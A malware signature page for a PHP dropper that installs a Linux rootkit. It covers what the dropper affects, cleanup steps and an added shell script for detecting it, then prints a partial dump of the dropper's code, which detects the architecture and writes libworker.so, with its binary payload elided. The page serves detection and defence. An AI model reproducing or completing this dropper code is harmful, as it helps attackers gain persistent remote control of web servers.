Malware Signatures


php.dropper.linux-rootkit.001

Droppers are specially crafted PHP scripts whose payload downloads (drops) a second malicious file and executes it. The dropped file can be a backdoor, hacktool, defacement or spam-SEO related malware.
This PHP code executes several system commands to download and run a Linux rootkit. The rootkit is a malicious program that allows the attacker to maintain remote access to the server and execute remote commands.

Affecting

Any vulnerable website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Cleanup is done by deleting the malicious code inside the file or replacing it with a fresh version. The infection can be found on your system by searching for parts of the dump below inside your site's files, and also by checking for unknown daemonised Perl processes.
You can also sign up with us and let our team remove the malware for you.
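The two checks above as a script, added here as an example and not part of the signature page or Sucuri's tooling: scan_webroot greps a web root for fixed-string fragments taken from the dump below, and list_perl_daemons lists perl processes that have no controlling terminal. The fragment list, the file extensions scanned and the TTY heuristic are this example's own choices.

```shell
#!/bin/sh
# Added example: detection helpers for php.dropper.linux-rootkit.001.
# The strings come from the dump on this page; choosing them is ours.
SIGNATURE_FRAGMENTS='libworker.so
MAYHEM_DEBUG
intval("9223372036854775807")
sprintf("%c", $n[8])'

# scan_webroot DIR: print every PHP-like file under DIR that contains any
# fragment. -F treats fragments as literal strings, -l prints each file once.
# Returns 0 when at least one file matched, 1 when none did.
scan_webroot() {
    dir=$1
    pat=$(mktemp) || return 2
    printf '%s\n' "$SIGNATURE_FRAGMENTS" > "$pat"
    found=$(find "$dir" -type f \
                \( -name '*.php' -o -name '*.phtml' -o -name '*.inc' \) \
                -exec grep -lF -f "$pat" {} + 2>/dev/null | sort)
    rm -f "$pat"
    [ -n "$found" ] || return 1
    printf '%s\n' "$found"
}

# list_perl_daemons: perl processes with no controlling TTY ("?" on Linux,
# "??" on BSD/macOS), the shape a daemonised process would have. A process
# may rename itself, so treat this as a first look, not proof of absence.
list_perl_daemons() {
    ps -eo pid=,tty=,user=,args= |
        awk '$2 ~ /^\?\??$/ && $4 ~ /(^|\/)perl/ { print }'
}

# Stand-alone use: ./scan.sh /var/www/html
if [ -n "${1:-}" ]; then
    scan_webroot "$1" || echo "no signature fragments found under $1"
    list_perl_daemons
fi
```

Review every hit by hand before deleting: a file that legitimately mentions one of the fragments would also be listed.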

Dump

<?php

header("Content-type: text/plain");

if (! function_exists('file_put_contents')) {
    function file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (! $f)
            return false;
        $bytes = fwrite($f, $data);
        fclose($f);
        return $bytes;
    }
}

$so32 = "......."
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;
print "Arch is ".$arch."\n";
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
    $n = unpack("C*", fread($f, 8));
    $so[7] = sprintf("%c", $n[8]);
    print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
    fclose($f);
}
print "SO dumped ".file_put_contents("./libworker.so", $so)."\n";
if (getenv("MAYHEM_DEBUG"))
    exit(0);